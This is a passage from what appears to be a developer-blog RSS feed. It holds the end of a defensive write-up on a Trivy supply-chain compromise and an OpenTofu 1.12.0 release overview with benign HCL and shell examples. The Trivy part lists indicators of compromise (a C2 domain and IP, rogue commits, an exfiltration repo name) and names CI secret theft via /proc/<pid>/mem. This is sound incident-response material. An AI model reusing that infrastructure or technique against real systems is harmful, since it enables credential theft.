&lt;td&gt;Tag hijacking / force-push&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Integrity verification&lt;/td&gt;
&lt;td&gt;sigstore/cosign signature + signing time check&lt;/td&gt;
&lt;td&gt;Forged binaries / images&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Release protection&lt;/td&gt;
&lt;td&gt;Enable GitHub Immutable Releases&lt;/td&gt;
&lt;td&gt;Release asset rewriting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential hygiene&lt;/td&gt;
&lt;td&gt;Atomic rotation, least-privilege tokens, short-lived OIDC&lt;/td&gt;
&lt;td&gt;Residual access / second breach&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runner monitoring&lt;/td&gt;
&lt;td&gt;Watch CI runners like production hosts&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/proc/&amp;lt;pid&amp;gt;/mem&lt;/code&gt; secret theft&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  7. How ManoIT Responded Internally
&lt;/h2&gt;

&lt;p&gt;ManoIT used this incident to roll the following into its GitOps/CI pipelines in stages. First, &lt;strong&gt;pin every third-party GitHub Action to a full SHA&lt;/strong&gt;, with Renovate/Dependabot raising update PRs at SHA granularity. Second, &lt;strong&gt;digest-pin&lt;/strong&gt; container base and scanner images, and exclude cache mirrors like &lt;code&gt;mirror.gcr.io&lt;/code&gt; from the trust boundary. Third, migrate CI secrets from static PATs to &lt;strong&gt;OIDC-based short-lived tokens&lt;/strong&gt; so that even if stolen, their lifetime is short. Fourth, write &lt;strong&gt;"atomic rotation"&lt;/strong&gt; explicitly into the incident runbook — coupling revoke and reissue into a single operation to eliminate the time window. Fifth, attach runtime security (eBPF-based process/network monitoring) to CI runner nodes to detect &lt;code&gt;/proc/&amp;lt;pid&amp;gt;/mem&lt;/code&gt; access and anomalous outbound traffic.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. Closing — Your Security Tools Are Part of Your Attack Surface
&lt;/h2&gt;

&lt;p&gt;The message of the Trivy compromise is clear: &lt;strong&gt;your security tools are part of your attack surface.&lt;/strong&gt; Trivy holds privileged access to CI secrets by design, and that very privilege makes it an ideal target. Single-layer defense doesn't survive modern multi-channel, multi-stage supply chain attacks — only defense in depth, stacking reference immutability, integrity verification, credential hygiene, and runner monitoring, holds up. The project has since recovered its normal release cadence, shipping &lt;strong&gt;v0.71.0&lt;/strong&gt; (2026-06-01) as the latest stable, and the core lessons — SHA pinning and Immutable Releases — are now standard practice well beyond Trivy. The point isn't to distrust your tools — it's to &lt;strong&gt;pin your references immutably and prove their integrity.&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Indicator (IoC)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;C2 domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;scan[.]aquasecurtiy[.]org&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 IP&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;45.148.10.212&lt;/code&gt; (Amsterdam)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rogue trivy commit&lt;/td&gt;
&lt;td&gt;&lt;code&gt;1885610c&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Malicious checkout commit&lt;/td&gt;
&lt;td&gt;&lt;code&gt;70379aad&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compromised setup-trivy commit&lt;/td&gt;
&lt;td&gt;&lt;code&gt;8afa9b9f9183b4e00c46e2b82d34047e3c177bd0&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exfil artifact&lt;/td&gt;
&lt;td&gt;public repos named &lt;code&gt;tpcp-docs&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Commit warning&lt;/td&gt;
&lt;td&gt;&lt;em&gt;"This commit does not belong to any branch on this repository"&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;p&gt;&lt;em&gt;Originally published on the &lt;a href="https://www.manoit.co.kr/forum/view/1483847" rel="noopener noreferrer"&gt;ManoIT blog&lt;/a&gt;. Cross-verified against the official advisory GHSA-69fq-xp46-6x23 / CVE-2026-33634. Version and IoC data are current as of 2026-06-04; re-check the official advisory before acting. · AI writing assist: Claude (Anthropic)&lt;/em&gt;&lt;/p&gt;





</description>
      <category>security</category>
      <category>devops</category>
      <category>github</category>
      <category>kubernetes</category>
    </item>
    <item>
      <title>OpenTofu 1.12.0: Dynamic prevent_destroy, destroy=false, Identity Import &amp; Provider Checksum Automation</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Wed, 03 Jun 2026 00:55:24 +0000</pubDate>
      <link>https://dev.to/x4nent/opentofu-1120-dynamic-preventdestroy-destroyfalse-identity-import-provider-checksum-21h3</link>
      <guid>https://dev.to/x4nent/opentofu-1120-dynamic-preventdestroy-destroyfalse-identity-import-provider-checksum-21h3</guid>
      <description>&lt;p&gt;Anyone who has run Infrastructure as Code (IaC) in production for a while knows it: the hard part isn't &lt;em&gt;creating&lt;/em&gt; a resource — it's protecting that resource differently per environment, detaching it safely, importing existing ones accurately, and not wrestling with lock files in CI.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenTofu 1.12.0&lt;/strong&gt; (released May 14, 2026) takes direct aim at exactly these operational pains. Forked from Terraform after HashiCorp's 2023 BSL license change, OpenTofu added OCI registry support and native S3 locking in 1.10, ephemeral values and the &lt;code&gt;enabled&lt;/code&gt; meta-argument in 1.11, and has now diverged into &lt;strong&gt;a mature IaC engine on its own track&lt;/strong&gt; rather than "a fork chasing Terraform." This article breaks down five of 1.12's key features from an operations and architecture angle, then lays out how ManoIT rolled them into our internal multi-cloud IaC.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why OpenTofu 1.12 Now — From Fork to Its Own Track
&lt;/h2&gt;

&lt;p&gt;Some context first. When IBM completed its acquisition of HashiCorp in February 2025, enterprise uncertainty around the BSL license grew, accelerating OpenTofu evaluation. As of April 2026, roughly &lt;strong&gt;12% of IaC practitioners have adopted&lt;/strong&gt; OpenTofu, with another 27% planning to evaluate or expand it, while organizations like Boeing, Capital One, and AMD run it in production. Many teams run both: Terraform for legacy, OpenTofu for greenfield.&lt;/p&gt;

&lt;p&gt;The important shift is that the two tools are &lt;strong&gt;no longer two versions of the same product&lt;/strong&gt;. OpenTofu has diverged toward native state encryption, provider-defined functions, and a faster release cadence; Terraform has gone toward AI-assisted features and deeper HCP integration. 1.12 sits in the middle of that divergence as a signal of operational maturity: "lifecycle control made dynamic, imports made accurate, lock files made automatic."&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Released&lt;/th&gt;
&lt;th&gt;Theme&lt;/th&gt;
&lt;th&gt;Headline&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1.10.0&lt;/td&gt;
&lt;td&gt;2025-06&lt;/td&gt;
&lt;td&gt;Deployment / security base&lt;/td&gt;
&lt;td&gt;OCI registry, native S3 lock, external key providers (state encryption)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.11&lt;/td&gt;
&lt;td&gt;H2 2025&lt;/td&gt;
&lt;td&gt;Expressiveness&lt;/td&gt;
&lt;td&gt;Ephemeral values, &lt;code&gt;enabled&lt;/code&gt; meta-argument, stronger moved/removed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.12.0&lt;/td&gt;
&lt;td&gt;2026-05-14&lt;/td&gt;
&lt;td&gt;Operational maturity&lt;/td&gt;
&lt;td&gt;Dynamic prevent_destroy, destroy=false, identity import, checksum automation, -json-into&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  2. Dynamic prevent_destroy — Per-Environment Delete Protection via Variables
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;prevent_destroy&lt;/code&gt; is a lifecycle argument that tells OpenTofu to error out if a plan would destroy a given object. It's commonly used for objects whose deletion would cause a major outage, or whose recreation requires manual work outside OpenTofu (like restoring a backup). The problem: until now this value was a &lt;strong&gt;static decision hard-coded into configuration&lt;/strong&gt;. If you share a module across prod and dev — wanting the prod database extremely hard to delete but the dev one easy to replace — a static value left you stuck.&lt;/p&gt;

&lt;p&gt;1.12.0 lets &lt;code&gt;prevent_destroy&lt;/code&gt; be &lt;strong&gt;defined dynamically in terms of other values within the same module&lt;/strong&gt; (such as input variables). It's the first lifecycle argument to be made dynamic, with more planned (umbrella issue #1329).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"prevent_destroy_database"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# Protected by default. Turn off via the dev module block.&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"example_database"&lt;/span&gt; &lt;span class="s2"&gt;"example"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;

  &lt;span class="nx"&gt;lifecycle&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;# 1.12: can reference variables -&amp;gt; control delete protection per environment from one module&lt;/span&gt;
    &lt;span class="nx"&gt;prevent_destroy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;prevent_destroy_database&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;Ops tip: keep the shared module default at &lt;code&gt;true&lt;/code&gt; (protected) and pass &lt;code&gt;false&lt;/code&gt; explicitly only from dev/staging callers. "Safe by default, exceptions explicit" is the pattern that prevents deletion accidents with the least code.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  3. destroy = false — Remove From State Without Destroying the Remote Object
&lt;/h2&gt;

&lt;p&gt;Another new lifecycle meta-argument, &lt;code&gt;destroy = false&lt;/code&gt;, lets you &lt;strong&gt;remove a managed resource from state without first destroying the remote object&lt;/strong&gt;. Previously, "I want to take this out of OpenTofu management but keep the actual infrastructure alive" had to be worked around with &lt;code&gt;removed&lt;/code&gt; blocks or &lt;code&gt;state rm&lt;/code&gt;. Expressed as a lifecycle argument, the intent now stays in code.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_s3_bucket"&lt;/span&gt; &lt;span class="s2"&gt;"legacy_logs"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;bucket&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"manoit-legacy-logs"&lt;/span&gt;

  &lt;span class="nx"&gt;lifecycle&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;# Exclude from destroy plans -&amp;gt; bucket is preserved even when dropped from state&lt;/span&gt;
    &lt;span class="nx"&gt;destroy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;⚠️ Warning: an object dropped from state via &lt;code&gt;destroy = false&lt;/code&gt; is no longer tracked by OpenTofu. If other code creates a new resource with the same name, you may hit an "already exists" conflict — sort out your import/naming policy right after detaching.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  4. Resource Identity Import — From Guessing IDs to Schema-Based
&lt;/h2&gt;

&lt;p&gt;In OpenTofu, importing existing infrastructure has long meant "getting the resource's &lt;code&gt;id&lt;/code&gt; string exactly right." But id formats vary wildly by resource type, and resources using composite keys (multiple combined attributes) are awkward to express in a single id. 1.12.0 introduces &lt;strong&gt;import by resource identity&lt;/strong&gt;, pointing at the remote object via the attributes defined by the resource type's &lt;strong&gt;identity schema&lt;/strong&gt;, instead of a single id string.&lt;/p&gt;

&lt;p&gt;For example, hashicorp/aws's &lt;code&gt;aws_ssm_maintenance_window_target&lt;/code&gt; has an identity schema requiring both &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;window_id&lt;/code&gt;. You can now specify these via the import block's &lt;code&gt;identity&lt;/code&gt; argument.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;to&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_ssm_maintenance_window_target&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;example&lt;/span&gt;

  &lt;span class="c1"&gt;# 1.12: point precisely via identity schema attributes instead of guessing id&lt;/span&gt;
  &lt;span class="nx"&gt;identity&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;window_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"mw-0123456789abcdef0"&lt;/span&gt;
    &lt;span class="nx"&gt;id&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"12345678-90ab-cdef-1234-567890abcdef"&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;For bulk imports, combine this with the import block's &lt;code&gt;for_each&lt;/code&gt; (loopable import blocks, available since OpenTofu 1.7). Together, identity-schema attributes and &lt;code&gt;for_each&lt;/code&gt; let a single block deterministically import hundreds of existing resources.&lt;/p&gt;
&lt;/blockquote&gt;
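&lt;p&gt;If you would rather commit one explicit, reviewable block per target than drive the import from &lt;code&gt;for_each&lt;/code&gt;, a small generator can emit the blocks from an inventory list. This is a sketch: the whitespace-separated input format (&lt;code&gt;NAME WINDOW_ID TARGET_ID&lt;/code&gt;) and the &lt;code&gt;gen_identity_imports&lt;/code&gt; helper are hypothetical, and the emitted HCL simply mirrors the &lt;code&gt;identity&lt;/code&gt; block shown above.&lt;/p&gt;

```shell
# Sketch: emit identity-based import blocks for existing SSM maintenance
# window targets. Input (hypothetical format): one target per line,
# whitespace-separated as NAME WINDOW_ID TARGET_ID. Blank lines and lines
# starting with # are skipped; malformed lines are reported on stderr.
gen_identity_imports() {
  awk '
    NF == 0 { next }      # skip blank lines
    $1 ~ /^#/ { next }    # skip comment lines
    NF != 3 {
      print "skipping malformed line " NR ": " $0 > "/dev/stderr"
      next
    }
    {
      printf "import {\n"
      printf "  to = aws_ssm_maintenance_window_target.%s\n", $1
      printf "  identity = {\n"
      printf "    window_id = \"%s\"\n", $2
      printf "    id        = \"%s\"\n", $3
      printf "  }\n"
      printf "}\n\n"
    }
  ' "$@"
}
```

&lt;p&gt;For example, &lt;code&gt;gen_identity_imports targets.txt &amp;gt; imports.tofu&lt;/code&gt; writes the blocks to a file that &lt;code&gt;tofu plan&lt;/code&gt; will read. Matching resource blocks must already exist in the configuration, and the plan should be reviewed before applying.&lt;/p&gt;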

&lt;h2&gt;
  
  
  5. Provider Checksum &amp;amp; Install Improvements — The End of tofu providers lock
&lt;/h2&gt;

&lt;p&gt;This is the change CI/CD operators will likely welcome most. Previously, teams using a global plugin cache or local mirror found the dependency lock file &lt;strong&gt;missing checksums&lt;/strong&gt; after &lt;code&gt;tofu init&lt;/code&gt;, forcing a separate &lt;code&gt;tofu providers lock&lt;/code&gt; run. The lock file recorded the registry's &lt;code&gt;zh:&lt;/code&gt; (zip) hashes, but the &lt;code&gt;h1:&lt;/code&gt; hashes needed for cache/mirror verification were computed locally, and only for the platform that ran the install.&lt;/p&gt;

&lt;p&gt;In 1.12.0, the OpenTofu Registry officially provides &lt;strong&gt;the full set of checksum formats&lt;/strong&gt; needed by all install methods. So a single &lt;code&gt;tofu init&lt;/code&gt; fills the lock file with both &lt;code&gt;h1:&lt;/code&gt; and &lt;code&gt;zh:&lt;/code&gt; hashes, letting you verify a global cache or local mirror immediately. &lt;code&gt;tofu providers lock&lt;/code&gt; now remains only for its original purpose: populating origin-registry checksums on systems reconfigured to use an alternate install source.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# After upgrading, the first init auto-adds h1: hashes to the lock file&lt;/span&gt;
tofu init

&lt;span class="c"&gt;# No longer needed just because of cache/mirror (as long as you use the default registry)&lt;/span&gt;
&lt;span class="c"&gt;# tofu providers lock -platform=linux_amd64 -platform=darwin_arm64&lt;/span&gt;

&lt;span class="c"&gt;# Confirm both zh:/h1: hash types landed in the lock file&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s1"&gt;'"(zh|h1):'&lt;/span&gt; .terraform.lock.hcl | &lt;span class="nb"&gt;head&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
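&lt;p&gt;To turn the &lt;code&gt;grep&lt;/code&gt; spot check into a CI gate, a short script can confirm that every provider block in the lock file carries both hash types after &lt;code&gt;tofu init&lt;/code&gt;. This is a sketch: &lt;code&gt;check_lock_hashes&lt;/code&gt; is a hypothetical helper, and it assumes the usual lock-file layout of one &lt;code&gt;provider "..." {&lt;/code&gt; block per provider containing a &lt;code&gt;hashes&lt;/code&gt; list.&lt;/p&gt;

```shell
# Sketch: check that every provider block in an OpenTofu dependency lock
# file lists at least one h1: and one zh: hash. Needs only POSIX sh + awk.
# Prints the offending providers and returns 1 if any hash type is missing.
check_lock_hashes() {
  awk '
    # A provider block opens with: provider "registry.opentofu.org/NS/NAME" {
    /^provider "/ {
      name = $2
      gsub(/"/, "", name)
      seen[name] = 1
    }
    /"h1:/ { h1[name]++ }
    /"zh:/ { zh[name]++ }
    END {
      bad = 0
      for (p in seen) {
        if (!(p in h1)) { print "missing h1: " p; bad = 1 }
        if (!(p in zh)) { print "missing zh: " p; bad = 1 }
      }
      if (bad == 0) print "ok: all providers have h1: and zh: hashes"
      exit bad
    }
  ' "${1:-.terraform.lock.hcl}"
}
```

&lt;p&gt;In CI, run &lt;code&gt;tofu init&lt;/code&gt; followed by &lt;code&gt;check_lock_hashes .terraform.lock.hcl || exit 1&lt;/code&gt; to fail the job when a provider lacks either hash type. The check covers presence only; it does not verify that the hashes span every platform you build on.&lt;/p&gt;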



&lt;p&gt;On top of this, &lt;strong&gt;concurrent provider installation&lt;/strong&gt; was added. When many providers are needed, install requests are parallelized to cut &lt;code&gt;tofu init&lt;/code&gt; time. The effect is most noticeable on monolithic root modules with 10+ providers.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Situation&lt;/th&gt;
&lt;th&gt;Up to 1.11&lt;/th&gt;
&lt;th&gt;1.12.0&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Global cache / mirror verification&lt;/td&gt;
&lt;td&gt;run &lt;code&gt;providers lock&lt;/code&gt; manually after &lt;code&gt;init&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;h1 &amp;amp; zh auto-filled in one &lt;code&gt;init&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Installing many providers&lt;/td&gt;
&lt;td&gt;sequential requests&lt;/td&gt;
&lt;td&gt;concurrent (parallel) -&amp;gt; faster init&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lock file hashes&lt;/td&gt;
&lt;td&gt;mostly &lt;code&gt;zh:&lt;/code&gt;, &lt;code&gt;h1:&lt;/code&gt; computed locally&lt;/td&gt;
&lt;td&gt;full formats prepopulated at install time&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  6. Simultaneous Output (-json-into) and Observable IaC
&lt;/h2&gt;

&lt;p&gt;Many OpenTofu commands support both human-oriented UI output and machine-readable JSON, but until now you could only get one or the other. A tool building an alternative UI therefore had to reimplement the entire UI from the JSON stream before it was usable at all. 1.12.0's &lt;code&gt;-json-into=FILENAME&lt;/code&gt; option sends the same machine-readable output as &lt;code&gt;-json&lt;/code&gt; to a separate file, while standard output keeps showing the normal human-facing UI.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Human UI in the terminal, machine JSON to a file, simultaneously&lt;/span&gt;
tofu apply &lt;span class="nt"&gt;-json-into&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;apply-events.json

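&lt;span class="c"&gt;# To consume events in real time, stream them into a named pipe (FIFO)&lt;/span&gt;
&lt;span class="nb"&gt;mkfifo&lt;/span&gt; /tmp/tofu-events
&lt;span class="c"&gt;# Start the reader first: opening a FIFO for writing blocks until a reader opens it.&lt;/span&gt;
&lt;span class="c"&gt;# Replace cat with the process that updates your web/terminal UI.&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; /tmp/tofu-events &amp;amp;
&lt;span class="c"&gt;# Keep apply in the foreground so its interactive approval prompt still works&lt;/span&gt;
tofu apply &lt;span class="nt"&gt;-json-into&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/tmp/tofu-events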
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Stream the JSON into an IPC object such as a named pipe or &lt;code&gt;/dev/fd/N&lt;/code&gt;, and an external tool can display progress while OpenTofu is still running. Combined with the local-only &lt;strong&gt;OpenTelemetry tracing&lt;/strong&gt; introduced in 1.10, this moves toward treating IaC execution as an observable pipeline.&lt;/p&gt;
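&lt;p&gt;As an illustration of what a consumer on the other end of &lt;code&gt;-json-into&lt;/code&gt; might do, the sketch below tallies events by type. It assumes the &lt;code&gt;-json&lt;/code&gt; format of one compact JSON object per line with a top-level &lt;code&gt;"type"&lt;/code&gt; field, and that failed resources are reported as &lt;code&gt;apply_errored&lt;/code&gt; events. &lt;code&gt;summarize_events&lt;/code&gt; is a hypothetical name, and a real integration should use a proper JSON parser rather than this regex extraction.&lt;/p&gt;

```shell
# Sketch: tally OpenTofu machine-readable events by "type", reading a file
# or FIFO (or stdin when no argument is given). Assumption: one compact
# JSON object per line, as in the -json output. Illustrative only; use a
# real JSON parser such as jq for production tooling.
summarize_events() {
  awk '
    # For each line, take the value of the first "type":"..." pair.
    match($0, /"type":"[a-z_]+"/) {
      # The prefix "type":" is 8 characters; skip it and the closing quote.
      t = substr($0, RSTART + 8, RLENGTH - 9)
      count[t]++
      if (t == "apply_errored") errors++
    }
    END {
      for (t in count) print t, count[t]
      # Exit non-zero if any resource reported an apply error.
      exit (errors ? 1 : 0)
    }
  ' "$@"
}
```

&lt;p&gt;For example, &lt;code&gt;summarize_events apply-events.json | sort&lt;/code&gt; prints one line per event type with its count once the file or pipe is closed, and the function returns non-zero if any &lt;code&gt;apply_errored&lt;/code&gt; event was seen.&lt;/p&gt;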

&lt;h2&gt;
  
  
  7. Deprecations — WinRM Provisioners and 32-bit
&lt;/h2&gt;

&lt;p&gt;1.12 is an operations-hardening release with few breaking changes, but you must be aware of two deprecation notices.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;1.12 status&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;WinRM provisioner connections&lt;/td&gt;
&lt;td&gt;warning (deprecated), still functional&lt;/td&gt;
&lt;td&gt;slated for removal in v1.13 -&amp;gt; migrate to OpenSSH for Windows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;32-bit CPU (&lt;code&gt;386&lt;/code&gt;, &lt;code&gt;arm&lt;/code&gt;) official builds&lt;/td&gt;
&lt;td&gt;no change in 1.12 (notice only)&lt;/td&gt;
&lt;td&gt;warnings from v1.13 -&amp;gt; builds dropped later, move to 64-bit (amd64/arm64)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ Warning: if you have provisioners using &lt;code&gt;connection { type = "winrm" }&lt;/code&gt;, "later" won't cut it. WinRM support is slated for removal in v1.13, so use this upgrade as the trigger to plan an OpenSSH-for-Windows migration. 32-bit environments should likewise plan a move to 64-bit within the next year.&lt;/p&gt;
&lt;/blockquote&gt;
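&lt;p&gt;A first inventory of WinRM usage can come from a plain text search. The sketch below, using the hypothetical helper name &lt;code&gt;find_winrm_connections&lt;/code&gt;, assumes connection types are written literally as &lt;code&gt;type = "winrm"&lt;/code&gt; in &lt;code&gt;.tf&lt;/code&gt; or &lt;code&gt;.tofu&lt;/code&gt; files; values passed through variables, or set inside modules pulled from other repositories, will not be found.&lt;/p&gt;

```shell
# Sketch: list provisioner connections that still use WinRM, with file and
# line number, followed by a total count. Only literal type = "winrm"
# assignments are detected.
find_winrm_connections() {
  dir="${1:-.}"
  # -r recurse, -n line numbers, -E extended regex; --include limits the
  # search to .tf and .tofu configuration files.
  matches=$(grep -rnE --include='*.tf' --include='*.tofu' \
    'type[[:space:]]*=[[:space:]]*"winrm"' "$dir" || true)
  if [ -n "$matches" ]; then
    printf '%s\n' "$matches"
    count=$(printf '%s\n' "$matches" | wc -l | tr -d ' ')
  else
    count=0
  fi
  echo "winrm connections found: $count"
}
```

&lt;p&gt;Running &lt;code&gt;find_winrm_connections .&lt;/code&gt; from each repository root gives the per-file list the migration roadmap needs, and a count of zero is an easy CI assertion once the migration is done.&lt;/p&gt;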

&lt;h2&gt;
  
  
  8. Cumulative Changes: 1.10 -&amp;gt; 1.12
&lt;/h2&gt;

&lt;p&gt;For teams jumping from 1.9 or below, here are the cumulative highlights.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;Introduced&lt;/th&gt;
&lt;th&gt;Core&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;State encryption (external key providers)&lt;/td&gt;
&lt;td&gt;1.10&lt;/td&gt;
&lt;td&gt;AWS/GCP KMS, OpenBao, PBKDF2 key provider chaining&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Native S3 state locking&lt;/td&gt;
&lt;td&gt;1.10&lt;/td&gt;
&lt;td&gt;S3 backend locking without DynamoDB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OCI registry distribution&lt;/td&gt;
&lt;td&gt;1.10&lt;/td&gt;
&lt;td&gt;distribute providers/modules to air-gapped environments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ephemeral values / &lt;code&gt;enabled&lt;/code&gt; meta-argument&lt;/td&gt;
&lt;td&gt;1.11&lt;/td&gt;
&lt;td&gt;in-memory-only data, conditional enable beyond count/for_each&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dynamic prevent_destroy / destroy=false&lt;/td&gt;
&lt;td&gt;1.12&lt;/td&gt;
&lt;td&gt;per-environment delete protection, state-only removal&lt;/td&gt;
&lt;/tr&gt;
